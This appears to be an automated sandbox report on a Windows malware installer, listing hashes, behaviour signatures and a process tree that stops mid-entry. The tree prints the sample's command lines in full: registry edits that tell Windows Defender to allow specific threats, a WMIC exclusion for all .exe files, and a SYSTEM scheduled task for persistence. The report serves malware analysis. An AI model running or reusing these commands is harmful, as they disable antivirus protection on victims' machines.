Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    29-08-2024 07:05

General

  • Target

    bebcf52118355604f1ac5b44a7a89c724c113d8cc597a3c51afce23bc337b73b.exe

  • Size

    7.3MB

  • MD5

    c52ebc14b8c316ec4114496958c301fa

  • SHA1

    6a1c43b6e03f113517c495bf6e7461077ecf4b37

  • SHA256

    bebcf52118355604f1ac5b44a7a89c724c113d8cc597a3c51afce23bc337b73b

  • SHA512

    d2bacb8979ac9121d3d5e7a898a7cacb522459e7a796ca04fd3b829bade5fb7138dbc6845f8510feb6a60b82b1ed31fbd6622b4559eefc26d22a01e527755c83

  • SSDEEP

    196608:91O4mL7RY7iTI3z7FDVC2CF0SYI1xowsTAVZf1A:3Okisj7F1s0i1xowscHK

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 33 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bebcf52118355604f1ac5b44a7a89c724c113d8cc597a3c51afce23bc337b73b.exe
    "C:\Users\Admin\AppData\Local\Temp\bebcf52118355604f1ac5b44a7a89c724c113d8cc597a3c51afce23bc337b73b.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4472
    • C:\Users\Admin\AppData\Local\Temp\7zSAAD6.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4344
      • C:\Users\Admin\AppData\Local\Temp\7zSAD47.tmp\Install.exe
        .\Install.exe /NdididilP "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3356
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2040
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:5032
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4920
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:5040
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:4936
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4932
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                  PID:4440
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:2588
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:5064
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  7⤵
                    PID:3320
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                • Suspicious use of WriteProcessMemory
                PID:1496
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:240
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                    • System Location Discovery: System Language Discovery
                    PID:348
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                5⤵
                • Indirect Command Execution
                • Suspicious use of WriteProcessMemory
                PID:324
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:404
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:3484
                    • C:\Windows\SysWOW64\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:3236
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
              4⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:4084
              • C:\Windows\SysWOW64\cmd.exe
                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2804
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3928
                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3408
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /CREATE /TN "bRatCwuzSAqtQGBopq" /SC once /ST 07:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSAD47.tmp\Install.exe\" 6g /GPdidLzEQ 525403 /S" /V1 /F
              4⤵
              • Drops file in Windows directory
              • Scheduled Task/Job: Scheduled Task
              PID:3160
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3356 -s 1012
              4⤵
              • Program crash
              PID:4724
      • C:\Users\Admin\AppData\Local\Temp\7zSAD47.tmp\Install.exe
        C:\Users\Admin\AppData\Local\Temp\7zSAD47.tmp\Install.exe 6g /GPdidLzEQ 525403 /S
        1⤵
        • Executes dropped EXE
        • Drops desktop.ini file(s)
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        PID:2080
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:4540
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            3⤵
            • Indirect Command Execution
            PID:2384
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3684
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                5⤵
                  PID:2140
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              3⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:3372
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                4⤵
                • System Location Discovery: System Language Discovery
                PID:4456
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2220
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              3⤵
              • Indirect Command Execution
              PID:4324
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                4⤵
                  PID:3424
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4684
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                3⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:1424
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2372
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:2924
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                3⤵
                • Indirect Command Execution
                • System Location Discovery: System Language Discovery
                PID:856
                • C:\Windows\SysWOW64\cmd.exe
                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:2092
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    5⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3748
                    • C:\Windows\SysWOW64\gpupdate.exe
                      "C:\Windows\system32\gpupdate.exe" /force
                      6⤵
                        PID:3384
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                2⤵
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2624
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:2588
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                    4⤵
                      PID:3176
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:4956
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                    3⤵
                      PID:4948
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:5032
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                      3⤵
                        PID:2644
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                        3⤵
                          PID:3416
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:3360
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                          3⤵
                            PID:2152
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3328
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4584
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1960
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                            3⤵
                              PID:1704
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                              3⤵
                                PID:2776
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:3688
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:4988
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1564
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3396
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4568
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1976
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:4248
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:984
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                      PID:2164
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1916
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2040
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                        PID:3224
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2944
                                      • C:\Windows\SysWOW64\reg.exe
